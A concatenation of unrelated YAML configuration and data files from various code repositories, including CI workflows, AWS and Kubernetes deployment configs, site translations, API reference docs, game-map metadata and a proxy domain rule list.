Yy9zdG9yaWVzLzcvc2VyaWVzIiwiaXRlbXMiOlt7InJlc291cmNlVVJJIjoi
aHR0cDovL2dhdGV3YXkubWFydmVsLmNvbS92MS9wdWJsaWMvc2VyaWVzLzYi
LCJuYW1lIjoiQ2FnZSBWb2wuIEkgKDIwMDIpIn1dLCJyZXR1cm5lZCI6MX0s
ImNvbWljcyI6eyJhdmFpbGFibGUiOjEsImNvbGxlY3Rpb25VUkkiOiJodHRw
Oi8vZ2F0ZXdheS5tYXJ2ZWwuY29tL3YxL3B1YmxpYy9zdG9yaWVzLzcvY29t
aWNzIiwiaXRlbXMiOlt7InJlc291cmNlVVJJIjoiaHR0cDovL2dhdGV3YXku
bWFydmVsLmNvbS92MS9wdWJsaWMvY29taWNzLzk0MSIsIm5hbWUiOiJDYWdl
IFZvbC4gSSAoSGFyZGNvdmVyKSJ9XSwicmV0dXJuZWQiOjF9LCJldmVudHMi
OnsiYXZhaWxhYmxlIjowLCJjb2xsZWN0aW9uVVJJIjoiaHR0cDovL2dhdGV3
YXkubWFydmVsLmNvbS92MS9wdWJsaWMvc3Rvcmllcy83L2V2ZW50cyIsIml0
ZW1zIjpbXSwicmV0dXJuZWQiOjB9LCJvcmlnaW5hbElzc3VlIjp7InJlc291
cmNlVVJJIjoiaHR0cDovL2dhdGV3YXkubWFydmVsLmNvbS92MS9wdWJsaWMv
Y29taWNzL<KEY>9
fV19fQ==
http_version:
recorded_at: Sat, 01 Jan 2000 00:00:00 GMT
recorded_with: VCR 3.0.3
|
spec/vcr/stories.yml
|
name: Build and Publish Images
on:
schedule:
- cron: '0 0 * * 3' # build and publish images every Wednesday
push:
branches:
- main
jobs:
publish-base-image:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: dorny/paths-filter@v2.1.0
if: github.event_name == 'push'
id: filter
with:
filters: '.github/filters.yml'
- name: Docker login
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' }}
run: echo "$DOCKER_TOKEN" | docker login --username=$DOCKER_USER --password-stdin
env:
DOCKER_USER: ${{ secrets.DOCKER_USER }}
DOCKER_TOKEN: ${{ secrets.DOCKER_TOKEN }}
- name: Build and publish android-sdk-base.Dockerfile
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' }}
run: sh publish_android_sdk_base_image.sh
publish-sdk-image:
needs: publish-base-image
runs-on: ubuntu-latest
strategy:
matrix:
api-level: [21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
steps:
- uses: actions/checkout@v2
- uses: dorny/paths-filter@v2.1.0
if: github.event_name == 'push'
id: filter
with:
filters: '.github/filters.yml'
- name: Docker login
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' }}
run: echo "$DOCKER_TOKEN" | docker login --username=$DOCKER_USER --password-stdin
env:
DOCKER_USER: ${{ secrets.DOCKER_USER }}
DOCKER_TOKEN: ${{ secrets.DOCKER_TOKEN }}
- name: Build and publish android-sdk-${{ matrix.api-level }}.Dockerfile
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' }}
run: sh publish_android_sdk_image.sh ${{ matrix.api-level }}
publish-emulator-image:
needs: publish-sdk-image
runs-on: ubuntu-latest
strategy:
matrix:
api-level: [21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
steps:
- uses: actions/checkout@v2
- uses: dorny/paths-filter@v2.1.0
if: github.event_name == 'push'
id: filter
with:
filters: '.github/filters.yml'
- name: Docker login
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' || steps.filter.outputs.emulator_images == 'true' }}
run: echo "$DOCKER_TOKEN" | docker login --username=$DOCKER_USER --password-stdin
env:
DOCKER_USER: ${{ secrets.DOCKER_USER }}
DOCKER_TOKEN: ${{ secrets.DOCKER_TOKEN }}
- name: Build and publish android-emulator-${{ matrix.api-level }}.Dockerfile
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' || steps.filter.outputs.emulator_images == 'true' }}
run: sh publish_android_emulator_image.sh ${{ matrix.api-level }}
|
.github/workflows/build-and-publish-images.yml
|
metadata:
title: Flushright
documentation: "http://docassemble.org/docs/documents.html#metadata rtf pdf"
---
mandatory: true
question: |
Here is your document.
subquestion: |
It demonstrates the flush right environment.
attachments:
- name: A test document
filename: test_document
metadata:
FirstHeaderLeft: Test me test me
FirstHeaderCenter: Test me test me
FirstHeaderRight: |
Example, LLP [BR]
124 Main Street, Suite 1500 [BR]
Philadelphia, PA 19102
HeaderLeft: Test me test me
HeaderCenter: Test me test me
HeaderRight: |
Example, LLP [BR]
123--24 Main Street, Suite 1500 [BR]
Philadelphia, PA 19102
FirstFooterLeft: Test me test me
FirstFooterCenter: Test me test me
FirstFooterRight: |
Example, LLP [BR]
124 Main Street, _Suite_ 1500 [BR]
Philadelphia, PA 19102
FooterLeft: Test me test me
FooterCenter: Test me test me
FooterRight: |
Example, LLP [BR]
123 Main Street, Suite 1500 [BR]
Philadelphia, PA 19102
SingleSpacing: true
content: |
This "line" is to the left.
This line is "also" to the left.
[FLUSHRIGHT] This line is "flush" right. [NEWLINE] So is _this_ line.
[INDENTBY 1in] [BORDER] This **line** is indented. [NEWLINE] So is this line.
[BORDER] [INDENTBY 2in 1in] This is a very "confined" paragraph
that is not to be taken lightly---because it's so absolutely
constrained beyond any belief or any person's imagination in the
whole wide world under the sun and the moon and the barn down
the street.
fruit| price
-----|-----:
apple|2.05
pear|1.37
orange|3.09
Lorem ipsum "dolor" sit amet from 1--2, consectetur adipiscing elit. Nunc
quis odio a dolor rhoncus elementum ut sed ex. Lorem ipsum dolor
sit amet, consectetur adipiscing elit. Aenean blandit massa nec
ante rutrum, nec interdum ipsum auctor. Pellentesque posuere
rhoncus pulvinar. Cras rutrum---if I may say---tellus sit amet elit euismod, quis
viverra metus dignissim. Aenean id convallis eros. Vestibulum
tristique, erat non ornare rhoncus, lectus urna consectetur
urna, sit amet rhoncus magna est a orci. Sed sed euismod tortor.
[BORDER] Aliquam nec turpis massa. Integer non vulputate nibh. Integer mi
justo, sagittis eget erat quis, porta auctor purus. Quisque ac
rutrum nibh. Duis id massa faucibus, facilisis mauris sit amet,
congue nisl. Duis vel odio vehicula, sodales tellus ut, tempor
ipsum. Morbi tempor aliquam gravida. Aliquam tortor est,
tincidunt sed libero et, vehicula ullamcorper tellus. Curabitur
quis magna erat. Vivamus euismod gravida ante, eu congue arcu
ultricies ac. Praesent porta euismod urna non sodales.
[NEWPAR]
Phasellus orci diam, sodales a elementum ac, gravida sit amet
erat. Nunc imperdiet malesuada magna, nec laoreet tortor dapibus
in. Praesent nulla elit, rhoncus vitae tincidunt non, rutrum ut
justo. Suspendisse aliquam sollicitudin porttitor. In suscipit,
magna sit amet eleifend iaculis, nisl elit sodales diam, dapibus
rutrum odio augue sed velit. Ut ullamcorper, quam at dapibus
hendrerit, nibh libero vulputate massa, non pretium nisl libero
at enim. Donec vestibulum sapien purus, et mattis nunc ultricies
non. Morbi velit lacus, ornare a lectus sed, auctor accumsan
ante. Donec imperdiet quis velit non varius. Suspendisse in
ultricies massa, id venenatis arcu.
In vitae erat luctus urna rutrum convallis et id nibh. Fusce
suscipit lacus at ligula mattis, vitae maximus nunc
ultrices. Praesent pellentesque nulla sem. Donec rhoncus leo
velit. Ut nec dui accumsan, commodo elit ac, maximus
lacus. Curabitur malesuada tortor augue, quis mattis augue
aliquet vel. Mauris gravida orci at neque dictum
scelerisque. Quisque turpis quam, dignissim ut augue quis,
euismod placerat nisi. Donec convallis mollis varius. Fusce
posuere rutrum risus vel porta. Curabitur erat diam, semper vel
condimentum vitae, fringilla non neque. Etiam nec nunc id est
pharetra dignissim. Nam condimentum nibh sit amet erat mattis
suscipit vitae vel eros. Donec eu pellentesque arcu, vitae
euismod tortor. Aliquam accumsan nulla aliquam diam ultricies
venenatis.
Cras mattis tellus neque, ut congue mi scelerisque eget. Cras
finibus tincidunt augue, ut rutrum risus vehicula vel. Praesent
fermentum tortor posuere feugiat interdum. Ut turpis arcu,
sagittis vitae odio vel, gravida cursus urna. Suspendisse
dignissim tortor id iaculis tincidunt. Nulla
facilisi. Suspendisse lacinia nisl interdum, egestas turpis non,
fringilla felis.
|
docassemble_base/docassemble/base/data/questions/examples/flushright.yml
|
en:
created: "Published on the"
author: "by"
description: "Bitcoin Core website"
footer: "Bitcoin Core project"
related: "Recommended"
viewallposts: "View all posts"
not_translated: "Note: this page has not been translated"
tocoverview: "Overview"
translation_outdated: "This translation may be out of date. Please compare with the English version."
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
zh_CN:
created: "发布在"
authored: "由"
description: "比特币核心网站"
footer: "比特币核心项目"
recommended: "推荐"
viewallposts: "查看所有帖子"
not_translated: "注:该页尚未被翻译"
tocoverview: "总览"
translation_outdated: "这段翻译可能已过期。请对照英文原版."
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
zh_TW:
created: "發表於"
author: "作者"
description: "Bitcoin Core 網站"
footer: "Bitcoin Core 計劃"
recommended: "推薦閱讀"
viewallposts: "显示所有文章"
not_translated: "注意:本頁未被翻譯"
tocoverview: "Overview"
translation_outdated: "This translation may be out of date compared to the English version"
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
ja:
created: "Published on the"
author: "by"
description: "Bitcoin Core ウェブサイト"
footer: "Bitcoin Core プロジェクト"
related: "Recommended"
viewallposts: "すべての投稿を見る"
not_translated: "注意: このページは翻訳されていません"
tocoverview: "Overview"
translation_outdated: "この翻訳は古くなっている可能性があります。英語版と比較してください。"
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
es:
created: "Publicado el"
author: "por"
description: "Sitio web de Bitcoin Core"
footer: "Proyecto Bitcoin Core"
related: "Recomendado"
viewallposts: "Ver todas las publicaciones"
not_translated: "Nota: esta página no ha sido traducida"
tocoverview: "Resumen"
translation_outdated: "Esta traducción podría estar obsoleta. Por favor compárela con la versión inglesa."
rss_feed: "Fuente RSS del Blog de Bitcoin Core"
rss_meetings_feed: "Feed de reuniones"
rss_blog_feed: "Feed de entradas del blog"
|
_data/translations.yml
|
Resources:
ClientDistribution:
Type: AWS::CloudFront::Distribution
DependsOn:
- ClientBucketResource
- ClientLoggingBucketResource
Properties:
DistributionConfig:
Origins:
- Id: !Ref TargetOriginId
DomainName:
!Select [2, !Split ['/', !GetAtt ClientBucketResource.WebsiteURL]]
OriginPath: ''
CustomOriginConfig:
HTTPPort: 80
HTTPSPort: 443
OriginProtocolPolicy: http-only
Enabled: true
# For a custom domain
Aliases:
- !Ref DomainName
HttpVersion: http2
Comment: CDN for static website
# PriceClass: 'PriceClass_100'
PriceClass: PriceClass_All
DefaultRootObject: index.html
## Since the Single Page App is taking care of the routing we need to make sure ever path is served with index.html
## The only exception are files that actually exist e.h. app.js, reset.css
CustomErrorResponses:
- ErrorCode: 403
ResponseCode: 200
ResponsePagePath: !Ref CustomErrorResponsePagePath
- ErrorCode: 404
ResponseCode: 200
ResponsePagePath: !Ref CustomErrorResponsePagePath
DefaultCacheBehavior:
AllowedMethods:
# - DELETE
- GET
- HEAD
- OPTIONS
# - PATCH
# - POST
# - PUT
Compress: true
## The origin id defined above
TargetOriginId: !Ref TargetOriginId
## Defining if and how the QueryString and Cookies are forwarded to the origin which in this case is S3
ForwardedValues:
QueryString: true
Cookies:
Forward: none
## The protocol that users can use to access the files in the origin. To allow HTTP use `allow-all`
ViewerProtocolPolicy: redirect-to-https
## The certificate to use when viewers use HTTPS to request objects.
ViewerCertificate:
SslSupportMethod: sni-only
AcmCertificateArn: !Ref ClientDistributionCertificate
Logging:
IncludeCookies: true
Bucket: !GetAtt ClientLoggingBucketResource.DomainName
Prefix: ''
|
resources/cf-distribution.yml
|
description: SSM Automation Setup
schemaVersion: '0.3'
parameters:
"Name":
"default": "ssmdocument"
"type": "String"
"description": "(Optional) CloudFormation StackName."
mainSteps:
- name: deleteStack
action: aws:deleteStack
onFailure: Continue
inputs:
StackName: "{{Name}}-setup"
- name: createStack
action: aws:createStack
inputs:
StackName: "{{Name}}-setup"
Capabilities: [ "CAPABILITY_NAMED_IAM" ]
TemplateBody: |
Description: "SSM Automation Setup"
Parameters:
LinuxLatestAmiId:
Type: 'AWS::SSM::Parameter::Value<AWS::EC2::Image::Id>'
Default: "/aws/service/ami-amazon-linux-latest/amzn-ami-hvm-x86_64-gp2"
WindowsLatestAmiId:
Type: 'AWS::SSM::Parameter::Value<AWS::EC2::Image::Id>'
Default: "/aws/service/ami-windows-latest/Windows_Server-2012-R2_RTM-English-64Bit-Base"
Resources:
TestRole:
Type : AWS::IAM::Role
Properties:
RoleName: "{{Name}}"
AssumeRolePolicyDocument:
Version: "2012-10-17"
Statement:
- Effect: "Allow"
Principal:
Service:
- "ec2.amazonaws.com"
- "ssm.amazonaws.com"
Action: "sts:AssumeRole"
ManagedPolicyArns:
- "arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM"
- "arn:aws:iam::aws:policy/CloudWatchAgentServerPolicy"
- "arn:aws:iam::aws:policy/AmazonSSMFullAccess"
IamInstanceProfile:
Type: "AWS::IAM::InstanceProfile"
Properties:
InstanceProfileName: "{{Name}}"
Roles:
- !Ref TestRole
LinuxEC2Instance1:
Type: "AWS::EC2::Instance"
Properties:
ImageId: !Ref LinuxLatestAmiId
InstanceType: "t2.micro"
IamInstanceProfile: !Ref IamInstanceProfile
Tags:
- Key: "Name"
Value: "{{Name}}-linux"
LinuxEC2Instance2:
Type: "AWS::EC2::Instance"
Properties:
ImageId: !Ref LinuxLatestAmiId
InstanceType: "t2.micro"
IamInstanceProfile: !Ref IamInstanceProfile
Tags:
- Key: "Name"
Value: "{{Name}}-linux"
LinuxAssociation1:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "Linux-RunPatchBaseline"
Name: "AWS-RunPatchBaseline"
ScheduleExpression: "cron(0 2 0 ? * SUN *)"
Targets:
- Key: tag:Name
Values: ["{{Name}}-linux"]
Parameters:
Operation: [ "Install" ]
WindowsEC2Instance1:
Type: "AWS::EC2::Instance"
Properties:
ImageId: !Ref WindowsLatestAmiId
InstanceType: "t2.micro"
IamInstanceProfile: !Ref IamInstanceProfile
Tags:
- Key: "Name"
Value: "{{Name}}-windows"
WindowsAssociation1:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "Windows-RunPatchBaseline"
Name: "AWS-RunPatchBaseline"
ScheduleExpression: "cron(0 2 0 ? * SUN *)"
Targets:
- Key: tag:Name
Values: ["{{Name}}-windows"]
Parameters:
Operation: [ "Install" ]
Association1:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "GatherSoftwareInventory"
Name: "AWS-GatherSoftwareInventory"
ScheduleExpression: "rate(30 minutes)"
Targets:
- Key: InstanceIds
Values: ["*"]
Association2:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "UpdateSSMAgentDaily"
Name: "AWS-UpdateSSMAgent"
ScheduleExpression: "rate(1 day)"
Targets:
- Key: tag:Name
Values: ["{{Name}}-linux", "{{Name}}-windows"]
outputs:
- "createStack.StackId"
- "createStack.StackStatus"
- "createStack.StackStatusReason"
|
AWS/ssm/documents/00 Setup.yaml
|
items:
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
id: "WithNumberOfProbes"
parent: "com.microsoft.azure.management.network"
children:
- "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int)"
langs:
- "java"
name: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
nameWithType: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
type: "Interface"
package: "com.microsoft.azure.management.network"
summary: "The stage of the TCP probe update allowing to modify the number of unsuccessful probes before failure is determined."
syntax:
content: "public static interface LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int)"
id: "withNumberOfProbes(int)"
parent: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
langs:
- "java"
name: "withNumberOfProbes(int probes)"
nameWithType: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int probes)"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int probes)"
overload: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes*"
type: "Method"
package: "com.microsoft.azure.management.network"
summary: "Specifies the number of unsuccessful probes before failure is determined."
syntax:
content: "public abstract LoadBalancerTcpProbe.Update withNumberOfProbes(int probes)"
parameters:
- id: "probes"
type: "int"
description: "number of probes"
return:
type: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.Update"
description: "the next stage of the update"
references:
- uid: "int"
spec.java:
- uid: "int"
name: "int"
fullName: "int"
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.Update"
name: "LoadBalancerTcpProbe.Update"
nameWithType: "LoadBalancerTcpProbe.Update"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.Update"
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes*"
name: "withNumberOfProbes"
nameWithType: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes"
package: "com.microsoft.azure.management.network"
|
docs-ref-autogen/com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-16 18:34"
game: "Unreal Tournament"
name: "CTF-RoadKill"
author: "Chris 'Sett' Montrose"
description: "Please look both ways when crossing the street."
releaseDate: "2002-06"
attachments:
- type: "IMAGE"
name: "CTF-RoadKill_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/CTF-RoadKill_shot_1.png"
originalFilename: "ctf-roadkill-final.zip"
hash: "340837050254ce940ddc6659dc5818b9cae1aaea"
fileSize: 3878688
files:
- name: "CTF-RoadKill.unr"
fileSize: 3541983
hash: "3c22006e21c08a1532e56efe6466cf61a0f64c5f"
- name: "RoadKIll.utx"
fileSize: 1129303
hash: "ce734b8fdacab9ac3db32b08670ca524a15c0114"
- name: "RoadKill2.utx"
fileSize: 2346023
hash: "5766f88ff514a022b2201aeadcbb729559adf45a"
- name: "RoadKill_M.u"
fileSize: 3651
hash: "97c27c2083e8d49298986d896d1d78d1eec7c443"
- name: "RoadKIll.u"
fileSize: 1017492
hash: "e6adc85788c41a64d2f806a637cb615a612845e2"
otherFiles: 1
dependencies:
CTF-RoadKill.unr:
- status: "OK"
name: "RoadKIll"
- status: "OK"
name: "RoadKill2"
- status: "OK"
name: "RoadKill_M"
RoadKill_M.u:
- status: "OK"
name: "RoadKill2"
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/ctf-roadkill-final.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/CTF/MapsR/&file=ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/CTF&file=ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/CTF/MapsR/ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/3/4/083705/ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/3/4/083705/ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Capture The Flag"
title: "CTF-Roadkill"
playerCount: "2-22"
themes:
City: 1.0
bots: true
|
content/Unreal Tournament/Maps/Capture The Flag/R/3/4/083705/ctf-roadkill_[34083705].yml
|
payload:
- DOMAIN-SUFFIX,apecn.com
- DOMAIN-SUFFIX,china-ceec-cooperation.com
- DOMAIN-SUFFIX,china.com
- DOMAIN-SUFFIX,chinabroadcast.cn
- DOMAIN-SUFFIX,chinamwh.com
- DOMAIN-SUFFIX,chinaradio.cn
- DOMAIN-SUFFIX,chinesecity.com.cn
- DOMAIN-SUFFIX,chinesefilms.cn
- DOMAIN-SUFFIX,chineseradio.cn
- DOMAIN-SUFFIX,chineseradio.com.cn
- DOMAIN-SUFFIX,cibn-intl.com
- DOMAIN-SUFFIX,cibn.cc
- DOMAIN-SUFFIX,cibnlive.cn
- DOMAIN-SUFFIX,cibnlive.com
- DOMAIN-SUFFIX,cibnott.net
- DOMAIN-SUFFIX,cibntv.net
- DOMAIN-SUFFIX,cri-grandera.com
- DOMAIN-SUFFIX,cri-on.com
- DOMAIN-SUFFIX,cri.cn
- DOMAIN-SUFFIX,cri.com.cn
- DOMAIN-SUFFIX,criankara.com
- DOMAIN-SUFFIX,criarabic.com
- DOMAIN-SUFFIX,criberlin.com
- DOMAIN-SUFFIX,cribsas.com
- DOMAIN-SUFFIX,crichinese.cn
- DOMAIN-SUFFIX,cricr.cn
- DOMAIN-SUFFIX,cricz.cn
- DOMAIN-SUFFIX,crieasyfm.com
- DOMAIN-SUFFIX,crienglish.com
- DOMAIN-SUFFIX,criezfm.cn
- DOMAIN-SUFFIX,criezfm.com
- DOMAIN-SUFFIX,crilondon.com
- DOMAIN-SUFFIX,crimoscow.com
- DOMAIN-SUFFIX,crinewsradio.cn
- DOMAIN-SUFFIX,crinihaochina.com
- DOMAIN-SUFFIX,crionline.cn
- DOMAIN-SUFFIX,cririo.com
- DOMAIN-SUFFIX,criseoul.com
- DOMAIN-SUFFIX,crisydney.com
- DOMAIN-SUFFIX,critokyo.com
- DOMAIN-SUFFIX,criwashington.com
- DOMAIN-SUFFIX,discoverplusradio.cn
- DOMAIN-SUFFIX,discoverplusradio.com.cn
- DOMAIN-SUFFIX,globalfm.cn
- DOMAIN-SUFFIX,guotv.com
- DOMAIN-SUFFIX,guotv.com.cn
- DOMAIN-SUFFIX,gvmedia.com.cn
- DOMAIN-SUFFIX,hitfm.cn
- DOMAIN-SUFFIX,huawangzhixun.com
- DOMAIN-SUFFIX,imgcdc.com
- DOMAIN-SUFFIX,inetradio.cn
- DOMAIN-SUFFIX,itaiwannews.cn
- DOMAIN-SUFFIX,musicplusradio.cn
- DOMAIN-SUFFIX,newsplusradio.cn
- DOMAIN-SUFFIX,nihaotv.net
- DOMAIN-SUFFIX,novotrail.com
- DOMAIN-SUFFIX,novotrails.com
- DOMAIN-SUFFIX,primeplusradio.cn
- DOMAIN-SUFFIX,readingchinese.cn
- DOMAIN-SUFFIX,silkroddream.com
- DOMAIN-SUFFIX,silktrek.com
- DOMAIN-SUFFIX,sinorusfocus.com
- DOMAIN-SUFFIX,sinorussian21st.org
- DOMAIN-SUFFIX,starschina.cn
- DOMAIN-SUFFIX,starschina.com
- DOMAIN-SUFFIX,starschina.com.cn
- DOMAIN-SUFFIX,starschinalive.com
- DOMAIN-SUFFIX,temyee.com
- DOMAIN-SUFFIX,vdnplus.cn
- DOMAIN-SUFFIX,vdnplus.com
- DOMAIN-SUFFIX,vdnplus.net
|
rules/blackmatrix7/CIBN/CIBN.yaml
|
# Docker image to use for deployment
image:
repository: "severalnines/proxysql"
tag: "2.0.15"
# Default number of ProxySQL replicas
numReplicas: 2
terminationGracePeriodSeconds: 30
# Default admin username
proxysql:
admin:
username: admin
password: <PASSWORD>
# Connect on this port to administer ProxySQL, view stats, etc.
iface: "0.0.0.0"
port: 6032
clusterAdmin:
username: clusteradmin
password: <PASSWORD>
# Query Cache Size
# queryCacheSizeMb: 256
# ProxySQL needs a cluster name
dataDir: "/var/lib/proxysql"
webEnabled: true
monitorConfigChange: false
additionConfig: |
mysql_servers =
(
{ address="mysql_server_0.headless_service.namespace.svc.cluster.local", port=3306 , hostgroup=10, max_connections=500 },
{ address="mysql_server_1.headless_service.namespace.svc.cluster.local", port=3306 , hostgroup=10, max_connections=500 },
{ address="mysql_server_2.headless_service.namespace.svc.cluster.local", port=3306 , hostgroup=10, max_connections=500 }
)
mysql_galera_hostgroups =
(
{
writer_hostgroup=10
backup_writer_hostgroup=20
reader_hostgroup=30
offline_hostgroup=9999
max_writers=1
writer_is_also_reader=1
max_transactions_behind=30
active=1
}
)
mysql_users =
(
{ username = "root" , password = "<PASSWORD>" , default_hostgroup = 10 ,transaction_persistent = 0, active = 1 }
)
mysql_query_rules =
(
{
rule_id=100
active=1
match_pattern="^SELECT .* FOR UPDATE"
destination_hostgroup=10
apply=1
},
{
rule_id=200
active=1
match_pattern="^SELECT .*"
destination_hostgroup=30
apply=1
},
{
rule_id=300
active=1
match_pattern=".*"
destination_hostgroup=10
apply=1
}
)
# MySQL Settings
mysql:
# Applications connect on this port to run queries
iface: "0.0.0.0"
port: 3306
version: "8.0.19-10"
# This is the monitor user, just needs usage rights on the databases
monitor:
username: root
password: <PASSWORD>
admin:
username: root
password: <PASSWORD>
lifecycle:
preStop:
exec:
command: ["/bin/sh", "-c", "sleep 5"]
# Hard means that by default pods will only be scheduled if there are enough nodes for them
# and that they will never end up on the same node. Setting this to soft will do this "best effort"
antiAffinity: "soft"
# Only used if you choose soft
weight: 1
antiAffinityTopologyKey: "kubernetes.io/hostname"
# Resource requests and limits
resources: {}
# Optional tolerations
tolerations: {}
|
charts/proxysql/values.yaml
|
version: '3'
services:
ccd-elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:6.4.2
container_name: ccd-elasticsearch
depends_on:
- "ccd-data-store-api"
environment:
- cluster.name=ccd-docker-es-cluster
- discovery.type=single-node
- bootstrap.memory_lock=true
- action.auto_create_index=.security*,.watches,.triggered_watches,.watcher-history-*,.logstash_dead_letter,.ml*,grantofrepresentation_cases,caveat_cases,legacy_cases,standingsearch_cases,willlodgement_cases
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
ulimits:
memlock:
soft: -1
hard: -1
volumes:
- esdata1:/usr/share/elasticsearch/data
ports:
- 9200:9200
networks:
- compose_default
ccd-logstash:
image: "ccd-logstash:probate"
container_name: ccd-logstash
depends_on:
- "ccd-elasticsearch"
environment:
- XPACK_MONITORING_ENABLED=false
- DB_URL=jdbc:postgresql://ccd-shared-database:5432/ccd_data?stringtype=unspecified&ssl=false
- DB_USER=ccd
- DB_PWD=<PASSWORD>
- ES_DATA_NODES_URL=http://ccd-elasticsearch:9200
- APPINSIGHTS_INSTRUMENTATIONKEY=dummy
networks:
- compose_default
kibana:
image: docker.elastic.co/kibana/kibana:6.3.0
container_name: kibana
ports:
- 5601:5601
depends_on:
- ccd-elasticsearch
# probate-man-database:
# build:
# context: ../docker/database
# ports:
# - 5344:5432
# healthcheck:
# test: psql -c 'select 1' -d postgres -U postgres
# retries: 2
# #mem_limit: 160m
# #memswap_limit: 0
# logstash-probateman:
# build: ../docker/logstash-probateman/.
# container_name: logstash-probateman
# command: bash -c "bin/logstash-plugin install logstash-filter-json_encode && docker-entrypoint -e"
# volumes:
# - ../docker/logstash-probateman/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
# - ./../logstash:/usr/share/logstash/pipeline:ro
# environment:
# - DB_URL=jdbc:postgresql://probate-man-database:5432/probate_man
# - DB_USER=probate_man
# - DB_PWD=<PASSWORD>
# - ES_DATA_NODES_URL=elasticsearch
# depends_on:
# - ccd-elasticsearch
# - probate-man-database
# - ccd-api-gateway
# - ccd-definition-store-api
# - ccd-case-management-web
# - ccd-user-profile-api
# - ccd-data-store-api
volumes:
esdata1:
driver: local
networks:
compose_default:
external: true
|
compose/elasticsearch.yml
|
homepage: https://github.com/snowleopard/build
changelog-type: ''
hash: 84229529df8fa8e680fb53933cf0c8c065298979d48d7a14bb1c12cb79294783
test-bench-deps:
extra: ! '>=1.5.3 && <1.7'
base: ! '>=4.7 && <5'
build: -any
containers: ! '>=0.5.7.1 && <0.6'
mtl: ! '>=2.2.1 && <2.3'
transformers: ! '>=0.5.2.0 && <0.6'
maintainer: ! '<NAME> <<EMAIL>>, github: @snowleopard'
synopsis: Build systems a la carte
changelog: ''
basic-deps:
extra: ! '>=1.5.3 && <1.7'
base: ! '>=4.7 && <5'
filepath: ! '>=1.4.1.0 && <1.5'
containers: ! '>=0.5.7.1 && <0.6'
mtl: ! '>=2.2.1 && <2.3'
transformers: ! '>=0.5.2.0 && <0.6'
random: ! '>=1.1 && <1.2'
algebraic-graphs: ! '>=0.1.1 && <0.2'
all-versions:
- 0.0.1
- 0.0.1.1
- '1.0'
author: <NAME>, <NAME>, <NAME>
latest: '1.0'
description-type: markdown
description: ! "# Build Systems à la Carte\n\n[](https://hackage.haskell.org/package/build)
[](https://travis-ci.org/snowleopard/build)
[](https://ci.appveyor.com/project/snowleopard/build)\n\nThis
project provides an executable framework for developing and comparing build systems,
